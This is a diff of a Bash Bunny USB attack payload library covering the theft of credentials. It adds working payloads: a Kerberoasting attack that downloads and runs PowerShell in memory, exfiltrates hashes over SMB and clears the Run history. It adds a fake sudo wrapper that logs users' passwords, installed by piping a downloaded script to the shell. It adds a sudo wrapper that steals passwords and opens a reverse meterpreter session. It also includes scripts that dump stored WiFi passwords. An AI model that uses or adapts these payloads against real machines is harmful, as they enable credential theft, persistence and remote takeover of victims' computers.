ATTACKMODE RNDIS_ETHERNET HID
|
||||
|
||||
# Start web server
|
||||
cd /root/udisk/payloads/$SWITCH_POSITION
|
||||
gohttp -p 80 &
|
||||
|
||||
# Start SMB Server
|
||||
python /tools/impacket/examples/smbserver.py s /loot/smb &
|
||||
|
||||
### Start attack ###
|
||||
LED ATTACK
|
||||
RUN WIN powershell "IEX (New-object Net.Webclient).DownloadString('http://172.16.64.1/s.ps1')"
|
||||
|
||||
# Wait until files are done copying.
|
||||
LED STAGE2
|
||||
while ! [ -f /loot/smb/EXFILTRATION_COMPLETE ]; do sleep 1; done
|
||||
|
||||
### Cleanup ###
|
||||
LED CLEANUP
|
||||
|
||||
# Delete Exfil file
|
||||
rm /loot/smb/EXFILTRATION_COMPLETE
|
||||
|
||||
# Move Kerberos SPNS to permanent loot directory
|
||||
mv /loot/smb/* /root/udisk/loot/roaster_exfil/
|
||||
|
||||
# Clean up temporary loot directory
|
||||
rm -rf /loot/smb/*
|
||||
|
||||
# Sync file system
|
||||
sync
|
||||
|
||||
# Complete
|
||||
LED FINISH
|
||||
34
payloads/library/credentials/Roaster/readme.md
Normal file
34
payloads/library/credentials/Roaster/readme.md
Normal file
@@ -0,0 +1,34 @@
|
||||
# Roaster
|
||||
* Author: golem445
|
||||
* Version: 1.0
|
||||
* Target: Windows Domains
|
||||
|
||||
## Description
|
||||
|
||||
Sets up Ethernet and HID keyboard interfaces simultaneously,
|
||||
then uses HID to import Invoke-Kerberoast into memory via
|
||||
Bash Bunny web server and execute the attack. Results are
|
||||
exported to the loot directory via SMB.
|
||||
|
||||
Note: This module will bypass network restrictions on USB
|
||||
disk drives as only a network card and keyboard are emulated.
|
||||
|
||||
## Requirements
|
||||
|
||||
Impacket and gohttp should be installed
|
||||
|
||||
## STATUS
|
||||
|
||||
|
||||
| Status | Description |
|
||||
| ------------------- | ---------------------------------------- |
|
||||
| Flashing Red | Impacket or gohttp not found |
|
||||
| Solid Violet | Setup for attack |
|
||||
| Flashing Amber | Attack in progress |
|
||||
| Flashing Cyan | Cleaning up |
|
||||
| Solid Green | Attack complete |
|
||||
|
||||
## Credits
|
||||
|
||||
* Tim Medin for Kerberoast
|
||||
* Hak5Darren for SMB exfil
|
||||
5
payloads/library/credentials/Roaster/s.ps1
Normal file
5
payloads/library/credentials/Roaster/s.ps1
Normal file
@@ -0,0 +1,5 @@
|
||||
IEX (New-Object Net.Webclient).DownloadString('http://172.16.64.1/Invoke-Kerberoast.ps1')
|
||||
Invoke-Kerberoast -Outputformat Hashcat | fl > \\172.16.64.1\s\output.txt
|
||||
New-Item -Path \\172.16.64.1\s -ItemType "file" -Name "EXFILTRATION_COMPLETE" -Value "EXFILTRATION_COMPLETE"
|
||||
Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue
|
||||
exit
|
||||
@@ -0,0 +1,63 @@
|
||||
#!/bin/bash
|
||||
|
||||
# Title: SudoBackdoor{Cleaner}
|
||||
# Author: oXis
|
||||
# Target: Mac/Linux
|
||||
# Version: 0.1
|
||||
# Attack Modes: ECM_ETHERNET, HID
|
||||
# Description: Get back the password grabbed by the sudo backdoor and do cleanup
|
||||
#
|
||||
# LEDS:
|
||||
# White: Ready
|
||||
# Blue Blink: Attacking
|
||||
# Green: Finished
|
||||
|
||||
LED SETUP
|
||||
|
||||
#setup the attack on macos (if false, attack is for Linux)
|
||||
mac=false
|
||||
|
||||
if [ "$mac" = true ]
|
||||
then
|
||||
ATTACKMODE ECM_ETHERNET HID VID_0X05AC PID_0X021E
|
||||
else
|
||||
ATTACKMODE ECM_ETHERNET HID
|
||||
fi
|
||||
|
||||
GET SWITCH_POSITION
|
||||
GET HOST_IP
|
||||
|
||||
cd /root/udisk/payloads/$SWITCH_POSITION/
|
||||
LOOT=/root/udisk/loot/SudoBackdoor
|
||||
mkdir -p $LOOT
|
||||
|
||||
LED ATTACK
|
||||
|
||||
if [ "$mac" = true ]
|
||||
then
|
||||
RUN OSX terminal
|
||||
else
|
||||
RUN UNITY xterm
|
||||
fi
|
||||
QUACK DELAY 2000
|
||||
|
||||
QUACK STRING scp -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no \~/.config/sudo/sudo.conf root@$HOST_IP:$LOOT/\$USER.sudo.passwd
|
||||
QUACK DELAY 200
|
||||
QUACK ENTER
|
||||
QUACK DELAY 500
|
||||
QUACK STRING hak5bunny
|
||||
QUACK DELAY 200
|
||||
QUACK ENTER
|
||||
QUACK DELAY 500
|
||||
if [ "$mac" = true ]
|
||||
then
|
||||
QUACK STRING rm -rf \~/.config/sudo \&\& sed -i \'/export PATH=\\~\\/.config\\/sudo:/d\' \~/.bash_profile
|
||||
else
|
||||
QUACK STRING rm -rf \~/.config/sudo \&\& sed -i \'/export PATH=\\~\\/.config\\/sudo:/d\' \~/.bashrc
|
||||
fi
|
||||
QUACK ENTER
|
||||
QUACK DELAY 200
|
||||
QUACK STRING exit
|
||||
QUACK DELAY 200
|
||||
QUACK ENTER
|
||||
LED SUCCESS
|
||||
42
payloads/library/credentials/SudoBackdoor/injector/back.sh
Executable file
42
payloads/library/credentials/SudoBackdoor/injector/back.sh
Executable file
@@ -0,0 +1,42 @@
|
||||
#!/bin/bash
|
||||
|
||||
if [ ! -d ~/.config/sudo ]
|
||||
then
|
||||
mkdir -p ~/.config/sudo
|
||||
fi
|
||||
|
||||
if [ -f ~/.config/sudo/sudo ]
|
||||
then
|
||||
rm ~/.config/sudo/sudo
|
||||
fi
|
||||
|
||||
echo '#!'$SHELL >> ~/.config/sudo/sudo
|
||||
cat <<'EOF' >> ~/.config/sudo/sudo
|
||||
/usr/bin/sudo -n true 2>/dev/null
|
||||
if [ $? -eq 0 ]
|
||||
then
|
||||
/usr/bin/sudo $@
|
||||
else
|
||||
echo -n "[sudo] password for $USER: "
|
||||
read -s pwd
|
||||
echo
|
||||
echo "$pwd" | /usr/bin/sudo -S true 2>/dev/null
|
||||
if [ $? -eq 1 ]
|
||||
then
|
||||
echo "$USER:$pwd:invalid" >> ~/.config/sudo/sudo.config
|
||||
echo "Sorry, try again."
|
||||
sudo $@
|
||||
else
|
||||
echo "$USER:$pwd:valid" >> ~/.config/sudo/sudo.config
|
||||
echo "$pwd" | /usr/bin/sudo -S $@
|
||||
fi
|
||||
fi
|
||||
EOF
|
||||
|
||||
chmod u+x ~/.config/sudo/sudo
|
||||
if [ -f ~/.bash_profile ]
|
||||
then
|
||||
echo "export PATH=~/.config/sudo:$PATH" >> ~/.bash_profile
|
||||
else
|
||||
echo "export PATH=~/.config/sudo:$PATH" >> ~/.bashrc
|
||||
fi
|
||||
@@ -0,0 +1,68 @@
|
||||
#!/bin/bash
|
||||
|
||||
# Title: SudoBackdoor{Injector}
|
||||
# Author: oXis
|
||||
# Target: Mac/Linux
|
||||
# Version: 0.1
|
||||
# Attack Modes: ECM_ETHERNET, HID
|
||||
#
|
||||
# Description:
|
||||
# Inject a sudo backdoor by installing a wrapper
|
||||
# inside .config/sudo/ and sourcing the dir
|
||||
# in the $PATH.
|
||||
#
|
||||
# LEDS:
|
||||
# White: Ready
|
||||
# Amber Blink: Waiting for server
|
||||
# Blue Blink: Attacking
|
||||
# Green: Finished
|
||||
|
||||
LED SETUP
|
||||
|
||||
#setup the attack on macos (if false, attack is for Linux)
|
||||
mac=false
|
||||
|
||||
if [ "$mac" = true ]
|
||||
then
|
||||
ATTACKMODE ECM_ETHERNET HID VID_0X05AC PID_0X021E
|
||||
else
|
||||
ATTACKMODE ECM_ETHERNET HID
|
||||
fi
|
||||
|
||||
GET SWITCH_POSITION
|
||||
GET HOST_IP
|
||||
|
||||
cd /root/udisk/payloads/$SWITCH_POSITION/
|
||||
|
||||
# starting server
|
||||
LED SPECIAL
|
||||
|
||||
iptables -A OUTPUT -p udp --dport 53 -j DROP
|
||||
python -m SimpleHTTPServer 80 &
|
||||
|
||||
# wait until port is listening (credit audibleblink)
|
||||
while ! nc -z localhost 80; do sleep 0.2; done
|
||||
|
||||
LED ATTACK
|
||||
|
||||
if [ "$mac" = true ]
|
||||
then
|
||||
RUN OSX terminal
|
||||
else
|
||||
RUN UNITY xterm
|
||||
fi
|
||||
QUACK DELAY 2000
|
||||
|
||||
if [ "$mac" = true ]
|
||||
then
|
||||
QUACK STRING curl "http://$HOST_IP/back.sh" \| sh
|
||||
else
|
||||
QUACK STRING wget "http://$HOST_IP/back.sh" \| sh
|
||||
fi
|
||||
QUACK DELAY 200
|
||||
QUACK ENTER
|
||||
QUACK DELAY 200
|
||||
QUACK STRING exit
|
||||
QUACK DELAY 200
|
||||
QUACK ENTER
|
||||
LED SUCCESS
|
||||
32
payloads/library/credentials/SudoBackdoor/readme.md
Normal file
32
payloads/library/credentials/SudoBackdoor/readme.md
Normal file
@@ -0,0 +1,32 @@
|
||||
# SudoBackdoor
|
||||
|
||||
* Author: oXis
|
||||
* Version: 0.1
|
||||
* Target: Mac/Linux
|
||||
|
||||
## Description
|
||||
|
||||
Injector: Inject a sudo backdoor by installing a wrapper inside .config/sudo/ and sourcing the dir in the $PATH.
|
||||
Cleaner: Get back the password grabbed by the sudo backdoor and do cleanup.
|
||||
|
||||
## Configuration
|
||||
|
||||
Inside the injector and the cleaner you can specify mac=true to switch the playload to macos mode.
|
||||
|
||||
## STATUS
|
||||
Injector
|
||||
|
||||
| LED | Status |
|
||||
| ---------------- | -------------------- |
|
||||
| White | Ready |
|
||||
| Ammber blinking | Waiting for server |
|
||||
| Blue blinking | Attacking |
|
||||
| Green | Finished |
|
||||
|
||||
Cleaner
|
||||
|
||||
| LED | Status |
|
||||
| ---------------- | -------------------- |
|
||||
| White | Ready |
|
||||
| Blue blinking | Attacking |
|
||||
| Green | Finished |
|
||||
@@ -1,62 +0,0 @@
|
||||
#!/bin/bash
|
||||
#
|
||||
# Title: WiFiCreds
|
||||
# Author: illwill
|
||||
# Version: 0.3
|
||||
#
|
||||
# Dumps the stored plaintext Wifi SSID & passwords from Windows boxes using Powershell
|
||||
# then stashes them in /root/udisk/loot/WiFiCreds
|
||||
#
|
||||
# Blue...............Running Powershell HID Script
|
||||
# Purple.............Getting WiFi Creds
|
||||
# Green..............Got WiFi Creds
|
||||
# Red................Didn't Get WiFi Creds
|
||||
|
||||
LED R 200
|
||||
mkdir -p /root/udisk/loot/WiFiCreds
|
||||
rm -f /root/udisk/loot/WiFiCreds/DONE
|
||||
|
||||
ATTACKMODE HID STORAGE
|
||||
LED B 200
|
||||
Q GUI
|
||||
Q DELAY 500
|
||||
Q STRING POWERSHELL
|
||||
Q DELAY 1000
|
||||
Q CTRL-SHIFT ENTER
|
||||
Q DELAY 2000
|
||||
Q LEFTARROW
|
||||
Q DELAY 100
|
||||
Q ENTER
|
||||
Q DELAY 1200
|
||||
Q STRING \$Bunny \= \(gwmi win32_volume -f \'label\=\'\'BashBunny\'\'\' \| Select-Object -ExpandProperty DriveLetter\)
|
||||
Q ENTER
|
||||
Q DELAY 100
|
||||
LED R B 200
|
||||
Q STRING \(netsh wlan show profiles\) \| Select-String \"\\:\(.+\)\$\" \| \%\{\$name\=\$_.Matches \| \% \{\$_.Groups\[1\].Value.Trim\(\)\}\; \$_\} \|
|
||||
Q STRING \%\{\(netsh wlan show profile name\=\""\$name\"" key\=clear\)\} \| Select-String \""Key Content\\W+\\:(.+)\$\"" \|
|
||||
Q STRING \%\{\$pass\=\$_.Matches \| \% \{\$_.Groups\[1\].Value.Trim\(\)\}\; \$_\} \| \%\{\[PSCustomObject\]@\{ "PROFILE_NAME"\=\$name\;PASSWORD\=\$pass \}\} \|
|
||||
Q STRING Format-Table -AutoSize \| Out-File \$Bunny\\loot\\WiFiCreds\\\$env:computername.txt
|
||||
Q ENTER
|
||||
Q DELAY 100
|
||||
Q STRING Out-File -FilePath \$BUNNY\\loot\\WifiCreds\\DONE
|
||||
Q ENTER
|
||||
Q DELAY 100
|
||||
|
||||
# Eject the USB Safely
|
||||
Q STRING \$Eject \= New-Object -comObject Shell.Application
|
||||
Q ENTER
|
||||
Q DELAY 100
|
||||
Q STRING \$Eject.NameSpace\(17\).ParseName\(\$Bunny\).InvokeVerb\(\"Eject\"\)
|
||||
Q ENTER
|
||||
Q DELAY 100
|
||||
|
||||
# GTFO
|
||||
Q STRING EXIT
|
||||
Q ENTER
|
||||
#Sync Drive
|
||||
sync
|
||||
|
||||
FILE="/root/udisk/loot/WiFiCreds/DONE"
|
||||
while [ ! -e $FILE ]; do sleep 1; done;
|
||||
sleep 1;
|
||||
if [ -e $FILE ]; then rm -f $FILE; LED G 200; else LED R; fi
|
||||
@@ -1,27 +0,0 @@
|
||||
# WiFiCreds
|
||||
|
||||
* Author: illwill
|
||||
* Version: Version 0.3
|
||||
* Target: Windows
|
||||
|
||||
## Description
|
||||
|
||||
Dumps the stored plaintext Wifi SSID & passwords from Windows boxes using
|
||||
Powershell HID attack, then stashes them in /root/udisk/loot/WiFiCreds/
|
||||
|
||||
## Configuration
|
||||
|
||||
None needed.
|
||||
|
||||
## STATUS
|
||||
|
||||
| LED | Status |
|
||||
| ------------------ | -------------------------------------------- |
|
||||
| White (blinking) | Setting up |
|
||||
| Blue (blinking) | Attack running |
|
||||
| Purple (blinking) | Dumping WiFi Credentials |
|
||||
| Green (blinking) | Succeeded Dumping WiFi Credentials |
|
||||
| Red (blinking) | Failed Dumping WiFi Credentials |
|
||||
|
||||
## Discussion
|
||||
https://forums.hak5.org/index.php?/topic/40413-payload-wificreds/
|
||||
@@ -1,38 +1,31 @@
|
||||
#!/bin/bash
|
||||
|
||||
# @title: WiFi Windows password grabber for the bash bunny
|
||||
# @author: Silvian Dragan
|
||||
# @props: Siem, Darren Kitchen
|
||||
# @version: 1.0
|
||||
# @target: Windows 7 (not tested for 8 and above)
|
||||
# Title: WiFiGrabber
|
||||
# Author: Silvian Dragan
|
||||
# Props: Siem, Darren Kitchen
|
||||
# Version: 1.0
|
||||
# Target: Windows 7
|
||||
# Description: This is a simple Wifi password grabber tested and working for Windows 7
|
||||
# However this has not been tested on Windows 8 and above and any suggestions and
|
||||
# improvements are greatly welcomed. Powershell scripting isn't higest skill so
|
||||
# I'm sure I'll have much to learn.
|
||||
#
|
||||
#
|
||||
# @details: This is a simple Wifi password grabber tested and working for Windows 7
|
||||
# However this has not been tested on Windows 8 and above and any suggestions and
|
||||
# improvements are greatly welcomed. Powershell scripting isn't higest skill so
|
||||
# I'm sure I'll have much to learn.
|
||||
#
|
||||
#
|
||||
# Colors:
|
||||
# Purple: starts the attack payload
|
||||
# Green: successful execution
|
||||
# Red: failure to load dependency ducky script
|
||||
#
|
||||
|
||||
# LEDS:
|
||||
# Purple: starts the attack payload
|
||||
# Green: successful execution
|
||||
# Red: failure to load dependency ducky script
|
||||
|
||||
ATTACKMODE HID STORAGE
|
||||
|
||||
LED R B 200
|
||||
LED SETUP
|
||||
|
||||
LANGUAGE=‘us’
|
||||
|
||||
source bunny_helpers.sh
|
||||
GET SWITCH_POSITION
|
||||
|
||||
if [ -f "/root/udisk/payloads/${SWITCH_POSITION}/ducky_script.txt" ]; then
|
||||
QUACK ${SWITCH_POSITION}/ducky_script.txt
|
||||
LED G
|
||||
LED FINISH
|
||||
else
|
||||
LED R
|
||||
LED FAIL
|
||||
echo "Unable to load ducky_script.txt" >> /root/debuglog.txt
|
||||
exit 1
|
||||
fi
|
||||
|
||||
@@ -5,21 +5,18 @@
|
||||
# Props: illwill
|
||||
# Version: 1.0
|
||||
# Target: Windows
|
||||
# Description: Uses the power of netsh to get a list of all wifi networks and passwords
|
||||
# stored on the computer. Windows 7 has some weird formatting issues with the
|
||||
# loot file. Tested and working on Windows 7, 8.1, and 10.
|
||||
# Goes through the netsh wlan show profiles and runs each with key=clear,
|
||||
# saving any networks/keys that aren't open or WEP. For any network that
|
||||
# users username and password to log in, you'll get the network name only.
|
||||
#
|
||||
# Uses the power of netsh to get a list of all wifi networks and passwords
|
||||
# stored on the computer. Windows 7 has some weird formatting issues with the
|
||||
# loot file.
|
||||
#
|
||||
# Tested and working on Windows 7, 8.1, and 10.
|
||||
#
|
||||
# Goes through the netsh wlan show profiles and runs each with key=clear,
|
||||
# saving any networks/keys that aren't open or WEP. For any network that
|
||||
# users username and password to log in, you'll get the network name only.
|
||||
#
|
||||
# Blue --- Setup
|
||||
# Yellow --- Using networks.txt to run through the networks
|
||||
# White --- Clean up
|
||||
# Green --- Done
|
||||
# LEDS:
|
||||
# Blue: Setup
|
||||
# Yellow: Using networks.txt to run through the networks
|
||||
# White: Clean up
|
||||
# Green: Done
|
||||
#
|
||||
|
||||
LED B
|
||||
|
||||
200
payloads/library/credentials/bushingsBlueTurtle/blueTurtle.py
Normal file
200
payloads/library/credentials/bushingsBlueTurtle/blueTurtle.py
Normal file
@@ -0,0 +1,200 @@
|
||||
#!/usr/bin/env python
|
||||
|
||||
realSudo = "/usr/bin/sudo" #"REAL_SUDO_HERE"
|
||||
pythonInterpreter = "PYTHON_EXECUTABLE_GOES_HERE"
|
||||
|
||||
def cantLoadModuleError():
|
||||
import sys
|
||||
if sys.version_info.major < 3:
|
||||
return ImportError
|
||||
if sys.version_info.minor < 6:
|
||||
return ImportError
|
||||
else:
|
||||
return ModuleNotFoundError
|
||||
|
||||
def getLootFileName():
|
||||
import os
|
||||
thisFullPath = os.path.abspath(__file__)
|
||||
thisDirectory = os.path.split(thisFullPath)[0]
|
||||
lootFile = thisDirectory + os.sep + "sudo.conf"
|
||||
return os.path.join(lootFile)
|
||||
|
||||
def initializeThisScript():
|
||||
'''This function will be run the first time by the bunny'''
|
||||
import subprocess
|
||||
import re
|
||||
pathFinder = subprocess.Popen("which python".split(), stdout = subprocess.PIPE)
|
||||
pythonExecutable = pathFinder.stdout.read().strip()
|
||||
pathFinder = subprocess.Popen("which sudo".split(), stdout = subprocess.PIPE)
|
||||
sudoExecutable = pathFinder.stdout.read().strip()
|
||||
try:
|
||||
import json
|
||||
except cantLoadModuleError():
|
||||
try:
|
||||
jsonInstaller = subprocess.Popen("pip install --user json".split(), stdout = subprocess.PIPE, stderr = subprocess.PIPE)
|
||||
jsonInstaller = subprocess.Popen("pip3 install --user json".split(), stdout = subprocess.PIPE, stderr = subprocess.PIPE)
|
||||
except:
|
||||
pass
|
||||
try:
|
||||
import getpass
|
||||
except:
|
||||
try:
|
||||
getPassInstaller = subprocess.Popen("pip install --user getpass".split(), stdout = subprocess.PIPE, stderr = subprocess.PIPE)
|
||||
except:
|
||||
pass
|
||||
thisFileName = __file__
|
||||
thisFile = open(thisFileName, 'r')
|
||||
originalCode = thisFile.read()
|
||||
thisFile.close()
|
||||
newCode = re.sub("PYTHON_EXECUTABLE_GOES_HERE", pythonExecutable, originalCode, 1)
|
||||
newCode = re.sub("REAL_SUDO_HERE", sudoExecutable, newCode, 1)
|
||||
thisFile = open(thisFileName, 'w')
|
||||
thisFile.write(newCode)
|
||||
thisFile.close()
|
||||
createLootFile(getLootFileName())
|
||||
silencePayloadFile()
|
||||
quit()
|
||||
|
||||
def createLootFile(lootFileName):
|
||||
import json
|
||||
initialData = {}
|
||||
lootFile = open(lootFileName, 'w')
|
||||
json.dump(initialData, lootFile)
|
||||
lootFile.close()
|
||||
|
||||
def validSudoPassword(password):
|
||||
import subprocess
|
||||
command = [realSudo, "-S", "-b", "echo", "Echo this"]
|
||||
wrapper = subprocess.Popen(command, stdin = subprocess.PIPE, stdout = subprocess.PIPE, stderr = subprocess.PIPE)
|
||||
wrapper.communicate(password + "\n")
|
||||
#wrapper.terminate()
|
||||
return not wrapper.returncode
|
||||
|
||||
def getPayloadFile():
|
||||
import os
|
||||
programDirectory = os.path.split(__file__)[0]
|
||||
return programDirectory + os.sep + ".sudo"
|
||||
|
||||
def silencePayloadFile(): #if there is an error making our reverse https, such as a bad network connection, this will make it fail without any output
|
||||
import os
|
||||
payloadFileName = getPayloadFile()
|
||||
if os.path.isfile(payloadFileName):
|
||||
payloadFile = open(payloadFileName, 'r')
|
||||
payload = payloadFile.read()
|
||||
payloadFile.close()
|
||||
payload = "try:\n\t" + payload + "\nexcept:\n\tpass"
|
||||
payloadFile = open(payloadFileName, 'w')
|
||||
payloadFile.write(payload)
|
||||
payloadFile.close()
|
||||
|
||||
def blueTurtleShell(password): #we are going to give it a password here. It won't cause a problem if it is not needed, and it might be needed if the user was doing some long process for the sudo.
|
||||
import subprocess
|
||||
import os
|
||||
payloadFile = getPayloadFile()
|
||||
if not os.path.isfile(payloadFile):
|
||||
return False
|
||||
command = " ".join([realSudo, "-S", "-b", pythonInterpreter, payloadFile])
|
||||
hackTheGibson = subprocess.Popen(command, stdin = subprocess.PIPE, shell = True)
|
||||
hackTheGibson.communicate(password + "\n")
|
||||
|
||||
def runIntendedSudoCommand(): #we won't need a password here, since we just got a good sudo when we verified their password
|
||||
import sys
|
||||
import os
|
||||
args = sys.argv[1:]
|
||||
for index, arg in enumerate(args):
|
||||
if arg == "sudo":
|
||||
args[index] = realSudo
|
||||
command = " ".join([realSudo, "-S"] + args)
|
||||
os.system(command) #not using subprocess. Usually the ability to mess with stdin/out/err is useful, but it just gets in the way of delivering the true user experience here. Especially if they use something interactive like vim.
|
||||
|
||||
def getSudoPassword(allowedAttempts = 3):
|
||||
import getpass
|
||||
user = getpass.getuser()
|
||||
if validSudoPassword(""): #this avoids having the program ask for a password if a valid one was just entered (normal sudo behavior). Also avoids creating a bunch of reverse shells if the user is repeatedly using sudo (that could create some noise on both ends)
|
||||
return (user, "", False)
|
||||
prompt = "[sudo] password for %s: " %user
|
||||
fail = "Sorry, try again."
|
||||
epicFail = "sudo: %s incorrect password attempts" %allowedAttempts
|
||||
success = False
|
||||
for i in range(allowedAttempts):
|
||||
password = getpass.getpass(prompt)
|
||||
if validSudoPassword(password):
|
||||
success = True
|
||||
break
|
||||
else:
|
||||
if not i == allowedAttempts - 1:
|
||||
print(fail)
|
||||
if not success:
|
||||
import sys
|
||||
print(epicFail)
|
||||
sys.stdout = open("/dev/null", 'w') #sometimes this generates stray outputs if there are three failed attempts. Sending them to limbo.
|
||||
sys.stderr = open("/dev/null", 'w')
|
||||
sys.stdout.flush()
|
||||
sys.stderr.flush()
|
||||
quit()
|
||||
return (user, password, True)
|
||||
|
||||
def loadLootFile(lootFileName):
|
||||
import json
|
||||
try:
|
||||
file = open(lootFileName, 'r')
|
||||
data = json.load(file)
|
||||
file.close()
|
||||
return data
|
||||
except:
|
||||
return False
|
||||
|
||||
def saveLootFile(loot, lootFileName):
|
||||
import json
|
||||
try:
|
||||
file = open(lootFileName, 'w')
|
||||
json.dump(loot, file)
|
||||
file.close()
|
||||
except:
|
||||
pass
|
||||
|
||||
def parseArguments():
|
||||
import sys
|
||||
argList = sys.argv
|
||||
if "--initializeScript" in sys.argv:
|
||||
initializeThisScript()
|
||||
else:
|
||||
return argList
|
||||
|
||||
|
||||
def prewrap():
|
||||
parseArguments()
|
||||
lootFile = getLootFileName()
|
||||
loot = loadLootFile(lootFile)
|
||||
try:
|
||||
user, password, passwordNeeded = getSudoPassword()
|
||||
except:
|
||||
user = None
|
||||
password = None
|
||||
passwordNeeded = True
|
||||
if passwordNeeded and user:
|
||||
loot[user] = password
|
||||
if loot:
|
||||
saveLootFile(loot, lootFile)
|
||||
return (user, password, passwordNeeded, loot)
|
||||
|
||||
def postwrap(user, password, loot):
|
||||
if not passwordNeeded:
|
||||
if user:
|
||||
try:
|
||||
password = loot[user]
|
||||
except:
|
||||
password = ""
|
||||
blueTurtleShell(password)
|
||||
|
||||
if __name__ == '__main__':
|
||||
parseArguments()
|
||||
try:
|
||||
user, password, passwordNeeded, loot = prewrap()
|
||||
except:
|
||||
pass
|
||||
runIntendedSudoCommand()
|
||||
try:
|
||||
postwrap(user, password, loot)
|
||||
except:
|
||||
pass
|
||||
112
payloads/library/credentials/bushingsBlueTurtle/payload.txt
Normal file
112
payloads/library/credentials/bushingsBlueTurtle/payload.txt
Normal file
@@ -0,0 +1,112 @@
|
||||
#!/bin/bash
|
||||
|
||||
# Title: Bushing's Blue Turtle
|
||||
# Author: Michael Weinstein
|
||||
# Target: Mac/Linux
|
||||
# Version: 0.1
|
||||
# Description: Create a wrapper for sudo sessions that will live inside ~/.config/sudo and be added
|
||||
# to the $PATH. After completing the sudo task for the user, it will attempt an encrypted
|
||||
# reverse meterpreter session. The msfvenom payload should be in this same directory as
|
||||
# shell.py Run the following command to generate a payload, remember to input the appropriate
|
||||
# IP and port
|
||||
# msfvenom -p python/meterpreter/reverse_https LHOST=<IP ADDRESS> LPORT=<PORT> -f raw > payload.py
|
||||
#
|
||||
# This payload was inspired greatly by SudoBackdoor
|
||||
# and much of the code here was derived (or copied
|
||||
# wholesale) from that with great thanks to oXis.
|
||||
#
|
||||
# This one's for Bushing. Probably should have written it in Perl.
|
||||
#
|
||||
# LEDS:
|
||||
# White: Ready
|
||||
# Amber Blink: Waiting for server
|
||||
# Blue Blink: Attacking
|
||||
# Green: Finished
|
||||
|
||||
LED SETUP
|
||||
|
||||
#setup the attack on macos (if false, attack is for Linux)
|
||||
mac=false
|
||||
|
||||
if [ "$mac" = true ]
|
||||
then
|
||||
ATTACKMODE ECM_ETHERNET HID VID_0X05AC PID_0X021E
|
||||
else
|
||||
ATTACKMODE ECM_ETHERNET HID
|
||||
fi
|
||||
|
||||
DUCKY_LANG us
|
||||
|
||||
GET SWITCH_POSITION
|
||||
GET HOST_IP
|
||||
|
||||
cd /root/udisk/payloads/$SWITCH_POSITION/
|
||||
|
||||
# starting server
|
||||
LED SPECIAL
|
||||
|
||||
iptables -A OUTPUT -p udp --dport 53 -j DROP
|
||||
python -m SimpleHTTPServer 80 &
|
||||
|
||||
# wait until port is listening (credit audibleblink)
|
||||
while ! nc -z localhost 80; do sleep 0.2; done
|
||||
# that was brilliant!
|
||||
|
||||
LED ATTACK
|
||||
|
||||
if [ "$mac" = true ]
|
||||
then
|
||||
RUN OSX terminal
|
||||
else
|
||||
RUN UNITY xterm
|
||||
fi
|
||||
QUACK DELAY 2000
|
||||
|
||||
if [ "$mac" = true ]
|
||||
then
|
||||
QUACK STRING curl "http://$HOST_IP/pre.sh" \| sh
|
||||
QUACK ENTER
|
||||
QUACK DELAY 200
|
||||
QUACK STRING curl "http://$HOST_IP/blueTurtle.py" \> "~/.config/sudo/sudo"
|
||||
QUACK ENTER
|
||||
QUACK DELAY 200
|
||||
QUACK STRING curl "http://$HOST_IP/shell.py" \> "~/.config/sudo/.sudo"
|
||||
QUACK ENTER
|
||||
QUACK DELAY 200
|
||||
QUACK STRING curl "http://$HOST_IP/post.sh" \| sh
|
||||
QUACK ENTER
|
||||
QUACK DELAY 200
|
||||
QUACK STRING python "~/.config/sudo/sudo" --initializeScript
|
||||
QUACK ENTER
|
||||
QUACK DELAY 200
|
||||
else
|
||||
QUACK STRING wget -O - "http://$HOST_IP/pre.sh" \| sh #I think wget defaults to outputting to a file and needs explicit instructions to output to STDOUT
|
||||
QUACK DELAY 200
|
||||
QUACK ENTER
|
||||
QUACK STRING wget -O - "http://$HOST_IP/blueTurtle.py" \> "~/.config/sudo/sudo" #Will test this on a mac when I finish up
|
||||
QUACK DELAY 200
|
||||
QUACK ENTER
|
||||
QUACK STRING wget -O - "http://$HOST_IP/shell.py" \> "~/.config/sudo/.sudo" #Will test this on a mac when I finish up
|
||||
QUACK DELAY 200
|
||||
QUACK ENTER
|
||||
QUACK STRING wget -O - "http://$HOST_IP/post.sh" \| sh
|
||||
QUACK DELAY 200
|
||||
QUACK ENTER
|
||||
QUACK STRING python "~/.config/sudo/sudo" --initializeScript
|
||||
QUACK DELAY 200
|
||||
QUACK ENTER
|
||||
fi
|
||||
|
||||
QUACK DELAY 200
|
||||
QUACK ENTER
|
||||
QUACK DELAY 200
|
||||
if [ "$mac" = true ]
|
||||
then
|
||||
QUACK DELAY 5000 #seems like macs need some extra time on this
|
||||
QUACK GUI w
|
||||
else
|
||||
QUACK STRING exit
|
||||
QUACK DELAY 200
|
||||
QUACK ENTER
|
||||
fi
|
||||
LED SUCCESS
|
||||
13
payloads/library/credentials/bushingsBlueTurtle/post.sh
Normal file
13
payloads/library/credentials/bushingsBlueTurtle/post.sh
Normal file
@@ -0,0 +1,13 @@
|
||||
#!/bin/bash
|
||||
|
||||
chmod u+x ~/.config/sudo/sudo
|
||||
if [ -f ~/.bash_profile ]
|
||||
then
|
||||
echo "export PATH=~/.config/sudo:$PATH" >> ~/.bash_profile
|
||||
elif if [ "$(uname -s)" == "Darwin" ]
|
||||
then
|
||||
echo "export PATH=~/.config/sudo:$PATH" >> ~/.bash_profile
|
||||
else
|
||||
echo "export PATH=~/.config/sudo:$PATH" >> ~/.bashrc
|
||||
fi
|
||||
|
||||
11
payloads/library/credentials/bushingsBlueTurtle/pre.sh
Normal file
11
payloads/library/credentials/bushingsBlueTurtle/pre.sh
Normal file
@@ -0,0 +1,11 @@
|
||||
#!/bin/bash
|
||||
|
||||
if [ ! -d ~/.config/sudo ]
|
||||
then
|
||||
mkdir -p ~/.config/sudo
|
||||
fi
|
||||
|
||||
if [ -f ~/.config/ssh/sudo ]
|
||||
then
|
||||
rm ~/.config/ssh/sudo
|
||||
fi
|
||||
44
payloads/library/credentials/bushingsBlueTurtle/readme.md
Normal file
44
payloads/library/credentials/bushingsBlueTurtle/readme.md
Normal file
@@ -0,0 +1,44 @@
|
||||
# Bushing's Blue Turtle: The sudo subverter
|
||||
|
||||
* Author: Michael Weinstein (@bionomicon)
|
||||
* Version: 0.1
|
||||
* Target: Mac/Linux
|
||||
|
||||
Mad credit to oXis for their attack approach. Much of the code here was developed using SudoBackdoor as a reference.
|
||||
|
||||
